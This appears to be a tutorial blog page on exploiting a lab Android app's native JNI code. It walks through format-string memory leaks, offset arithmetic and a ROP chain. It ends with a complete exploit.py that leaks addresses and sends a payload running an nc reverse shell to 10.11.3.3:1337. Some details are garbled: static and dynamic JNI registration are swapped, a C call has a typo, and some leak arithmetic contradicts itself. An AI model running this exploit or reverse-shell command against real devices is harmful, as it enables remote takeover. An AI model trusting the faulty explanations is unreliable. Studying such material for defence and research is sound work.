description	cover	coverY
06/11/2024 -- Time to wreck some havoc	https://i.imgur.com/hxRHztm.gif	44.74285714285714

🔎 Pinpointing Low-Level Bugs in Android: Stack Smashing

Introduction

By leveraging Android's Native Development Kit (NDK), it will directly grant us access to the Java Native Implementation (JNI). Essentially, this allows us to be able to utilize native, C code within Java at the same time. JNI essentially is a mechanism that makes this possible. The NDK is built on top of the JNI.

This section will focus on stack-based exploitation.

{% hint style="info" %} Note: For greater introspection, please check out my Binary Exploitation section as well as others in the community. A lot of what is talked about there will be referred to in here! {% endhint %}

{% hint style="info" %} Reminder: JNI is usually implemented when file I/O, sound, graphical rendering, encryption, etc. is taking place. This is because C/C++ simply does it better and quicker. {% endhint %}

Need More Context Before Diving in?

Be sure to check out my previous blogs on binary exploitation on x86/64 architectures. Especially, when it comes to bypassing security mitigations such as NX, ASLR, and canaries!

{% content-ref url="../../binary-exploitation/bypassing-aslr-and-nx-dep-diving-deeper.md" %} bypassing-aslr-and-nx-dep-diving-deeper.md {% endcontent-ref %}

{% content-ref url="../../binary-exploitation/memory-protections/no-execute-nx.md" %} no-execute-nx.md {% endcontent-ref %}

{% content-ref url="../../binary-exploitation/binary-exploitation-methodology.md" %} binary-exploitation-methodology.md {% endcontent-ref %}

Oracle JNI Docs

{% embed url="https://docs.oracle.com/javase/8/docs/technotes/guides/jni/spec/design.html" %} Oracle JNI Docs {% endembed %}

JNI Illustration

As you can see, the JNI is simply just an array of pointers (pointer-to-pointer array). Each JNI function will include a Java_OnLoad or begin with Java_com. There are two ways of calling JNI functions, static and dynamic.

Static Calls

Uses the RegisterNatives API call.

Java side:

The method within the Java class is going to be identified as follows during declaration:

public class MyClass {
    public static void myStaticMethod() {
        // Implementation here
    }
}

C side:

JNIEnv *env
jclass cls = (*env)->FindClass(env, "MyClass");
jmethodID mid = (*env)->GetStaticMethodIDenv, cls, "myStaticMethod", "()V");
(*env)->CallStaticVoidMethod(env, cls, mid);

Dynamic Calls

Using JNI native method name resololving.

Search for "Java_" within Ghidra's symbol tree.

Leveraging Memory Leak Bugs

While performing static analysis on the target, it is always important to recognize and document any data ingestion points. This will allow us to know what to look for when debugging various functions.

What Kind of Data can be Leaked?

Data
Addresses
PII (sensitive data)
Passwords
Arming ourselves with data to bypass ASLR

Bugs That Exist

Format String Bugs will be the most common
Use-After-Free's
Heap Overflows
Type Confusion

Leaking Data in Memory via Memory Leak

{% embed url="https://media0.giphy.com/media/Q2W4hziDOyzu0/giphy.gif?cid=6c09b952020782cauu5o9zy9rb47rueprg6jdmirl7h7m33z&ep=v1_gifs_search&rid=giphy.gif&ct=g" %}

The main one will be format string bugs.

This is simply when an attacker possesses the ability to control the format-string specifier in format-string functions. Ultimately, this leads to the ability to leak and write data, which leads to code execution. These vulnerabilities will allow us to not only leak data, but write data in memory.

What to look for

Vulnerable:

void vulnerable_function(char *user_input) {
    printf(user_input);  // Vulnerable to format string attack
}

Not Vulnerable:

void secure_function(char *user_input) {
    printf("%s", user_input);
}

When data is requested, we the attackers, can pass our own format string specifiers. For example, %lx, %s, %n (write data).

{% hint style="info" %} Note: %x will just be 32-bit, whereas %lx will be a 64-bit value! {% endhint %}

Don't Forget About Positional Arguments When Leaking Data!

We can utilize positional arguments to leak specific data off of the stack, straight to our console!

%110$lx # -> Prints the 110th element from the stack

The ultimate goal is to find a location on the stack that is not changing, or reoccurring a few times after a couple executions. So, it's okay to run the program more than once to verify, take your time.

For example:

After leaking, we can use $lx to leak and leverage positional arguments if need be as well.

Once leaking, we can obtain the stack base, since our leak will "start" from the stack base, or stack pointer.

This represents our stack_base. Obtaining stack base (sp)

We can then look for reoccurring addresses within the stack dump (x/200gx $sp) or we can vmmap certain addresses.

Below, you can see that we have three addresses obtained from our stack dump information.

Utilizing vmmap to obtain memory mapping/segment information

Leaking an Address

The goal here is to find the offset to the image base (find an offset from the leaked address to the base address). After that, we will possess enough information to calculate the base address.

Leak an address
Find a leaked libc library address in memory; confirming with vmmap

This represents our Leaked_address. Since we are adding 8 anyways for byte-alignment, we want to be able to grab the blue address, not the 64-bit address

Using the Following Equation

Offset = Leaked_address (%lx -- libc addr, verified w/ vmmap) - stack_base (x/200gx $sp)

Example:

Offset = 0x789dd19c58 (add +8) - 0x789dd19670

Offset = 5E8 (hex)

How To: Leak

Through RE efforts, locate vulnerable bugs and format-string functions
While performing dynamic analysis and debugging, be sure to disass <function_name>, obtain the address of the format-string function and place a breakpoint on it
Take note of the stack address by examining it: x/200gx $sp
Take some time to analyze the stack dump and look for addresses that are occurring next to each other, contiguously in memory. This value will be known as our "constant" leak address. As it will remain unchanged and constant throughout numerous executions
vmmap leaked addresses in order to find out if they belong to our dynamic library, (e.g.) libc

Leaking a libc Address!

{% hint style="info" %} Note: This is literally the same process as before, except with an additional step (step 5)! {% endhint %}

Through RE efforts, locate vulnerable bugs and format-string functions
While performing dynamic analysis and debugging, be sure to disass <function_name>, obtain the address of the format-string function and place a breakpoint on it
Take note of the stack address by examining it: x/200gx $sp
Take some time to analyze the stack dump and look for addresses that are occurring next to each other, contiguously in memory. This value will be known as our "constant" leak address. As it will remain unchanged and constant throughout numerous executions
vmmap leaked addresses in order to find out if they belong to our dynamic library, (e.g.) libc

Obtaining Current libc Address

Okay, but how do we easily find libc addresses without having to vmmap every single dumped stack address?

We need to get the current libc address via vmmap.

0x0000007b5ec79000

There's an easy work-around for this. We can simply search for the first four-bytes of the address obtained from the libc base.

In this case, we are going to be searching for 7b5e

Obtain leaked_address from earlier, remember, blue address + 8:

Leaked address, + 8, giving us->0x789dd19c58 + 8 =0x789dd19c58

We can do this by:

Obtaining stack base address:

0x789dd19670

Equation to Follow

libc_address = leaked_address (0x789dd19c58) - stack_base (0x789dd19670)

libc address = leaked_address - stack_base / 8 (byte-size) + 6 (padding) = libc's position in memory

Our position will then be in hex, we need to obtain the decimal conversion of that hex number.

Example

0x789dd19c58−0x789dd19670 = 0x5E8

We then take this and do the following:

0x5E8 / 8 + 6 = hex_position -> convert to decimal = libc_distance

0x5E8 / 8 + 6 = C3 -> Converted to Decimal = 195

We can then start crafting out an exploit!

Using the data collected above, we can start crafting an exploit!

{% hint style="info" %} 🚨 Be sure to be conscious of the comments that are throughout the code. Some important enumeration information that is necessary to exploit the target has been commented out for brevity, simplicity, or for the sake of a separate cyber effect (type of vulnerability) to be brought on upon the target. {% endhint %}

exploit.py:

#!/usr/bin/env python2.7

# exploit.py -- featuring a multi-type exploit against a single target
# Featuring ret2win, ret2libc, memory leak address enumeration, and ROP chain

import socket
import time
import struct

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect(("<victim_ip_here>",<victim_port_here>))
data = s.recv(200)
# Leak Stack Address
print "Step 1: Leak Stack Address!\n";
s.send("%26$lx")            # Seemingly reoccurring address in debugger
leakedStack = s.recv(200)   # Receive 200-bytes
print "[+] Leaked process stack: 0x" + leakedStack   # Print received values from above

print"---------------------------------------------"

# Leak Libc address
print "\nStep 2: Leak libc address from the stack!\n"
print "[!] Leaking libc address and sending format string of %195$ls to our vulnerable program"
s.send("%195$lx")           # Sending format string to program  
leakedLibc = s.recv(200)    # Receive leaked libc address
print "[+] Leaked libc address: 0x" + leakedLibc

leakedStack = int("0x"+leakedStack, 16)
leakedStackTop = leakedStack - 0x1B8
print "[+] Calculated stack top: " + hex(leakedStackTop)

print"---------------------------------------------"

# Calculate Libc Base Address
print "\nStep 3: Calculate libc base address\n"
print "[!] Calculating libc base..."
leakedOffset = 0x52FBC
libcBase = int("0x"+leakedLibc, 16) - leakedOffset
print "[+] Calculated libc base: "  , hex(libcBase)
print"---------------------------------------------"

prefix = "0xfa"

overflow = "A"*208
# Inside GDB -> "p printLog" -> 0x7366a962f0 
# [!] Note: this will change each program execution due to ASLR, be sure to obtain and change each execution
# pc = "\xf0\x62\xa9\x66\x73\x00\x00\x00" 

print"\nStep 4: Obtain gadget and system address\n"
print"[!] Obtaining gadget address and system address from libc..."

# Address for the "pop" gadget (obtained via ropper): 0x000000000007f96c: ldp x0, x8, [sp, #0x20]; ldr x27, [sp, #0x10]; str wzr, [x8]; blr x27; 
pop_gadget = libcBase + 0x7f96c

# Junk data
junk = "A"*24
# ret2libc ROP chain setup
# system = "BBBBBBBB" # p system system - libcBase
# system_args = "CCCCsCCCC"
# system_args_addr = "DDDDDDDD"

# exploit = prefix + overflow + struct.pack("<Q", pop_gadget) + junk + system + "A" * 8 + system_args_addr + system_args

# libcBase + system_offset (obtained via "p system" in gdb)
system = libcBase + 0x62F3C #System = libcBase (vmmap libc.so address - system above)
print "[+] Gadget address " , hex(pop_gadget)
print "[+] System address " , hex(system)
print"---------------------------------------------"

# Use our leakedStackTop to find the beginning of our command on the stack
system_args_address = leakedStackTop + 0xB0
system_args = "C" * 32
system_args= "rm /data/data/com.example.mynativetest/f;/system/bin/toybox mkfifo /data/data/com.example.mynativetest/f;cat /data/data/com.example.mynativetest/f|/system/bin/sh -i 2>&1|/system/bin/toybox nc 10.11.3.3 1337 >/data/data/com.example.mynativetest/f"

# Build the exploit string
# ret2win exploit: exploit = prefix + overflow + pc
# ret2libc exploit: A*208 + gadget + A * 24 + system + 8 * junk + address_cmd + cmd_string
# Ropchain exploit: exploit = prefix + overflow + struct.pack("<Q",pop_gadget) + "b" * 24 + struct.pack("<Q",system) + "b" * 8 + struct.pack("<Q",system_args_address) + struct.pack("<Q", leakedStackTop) + system_args
# Reverse shell exploit
exploit = prefix + overflow + struct.pack("<Q", pop_gadget) + junk + struct.pack("<Q", system) + "A" * 8 + struct.pack("<Q", system_args_address) + struct.pack("<Q", system_args_address) + system_args

s.send(exploit)

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

pinpointing-low-level-bugs-in-android-stack-smashing.md

pinpointing-low-level-bugs-in-android-stack-smashing.md

🔎 Pinpointing Low-Level Bugs in Android: Stack Smashing

Introduction

Need More Context Before Diving in?

Oracle JNI Docs

Static Calls

Dynamic Calls

Leveraging Memory Leak Bugs

What Kind of Data can be Leaked?

Bugs That Exist

Leaking Data in Memory via Memory Leak

What to look for

Don't Forget About Positional Arguments When Leaking Data!

For example:

Leaking an Address

Using the Following Equation

How To: Leak

Leaking a libc Address!

Obtaining Current libc Address

Okay, but how do we easily find libc addresses without having to vmmap every single dumped stack address?

Equation to Follow

We can then start crafting out an exploit!

Files

pinpointing-low-level-bugs-in-android-stack-smashing.md

Latest commit

History

pinpointing-low-level-bugs-in-android-stack-smashing.md

File metadata and controls

🔎 Pinpointing Low-Level Bugs in Android: Stack Smashing

Introduction

Need More Context Before Diving in?

Oracle JNI Docs

Static Calls

Dynamic Calls

Leveraging Memory Leak Bugs

What Kind of Data can be Leaked?

Bugs That Exist

Leaking Data in Memory via Memory Leak

What to look for

Don't Forget About Positional Arguments When Leaking Data!

For example:

Leaking an Address

Using the Following Equation

How To: Leak

Leaking a libc Address!

Obtaining Current libc Address

Okay, but how do we easily find libc addresses without having to vmmap every single dumped stack address?

Equation to Follow

We can then start crafting out an exploit!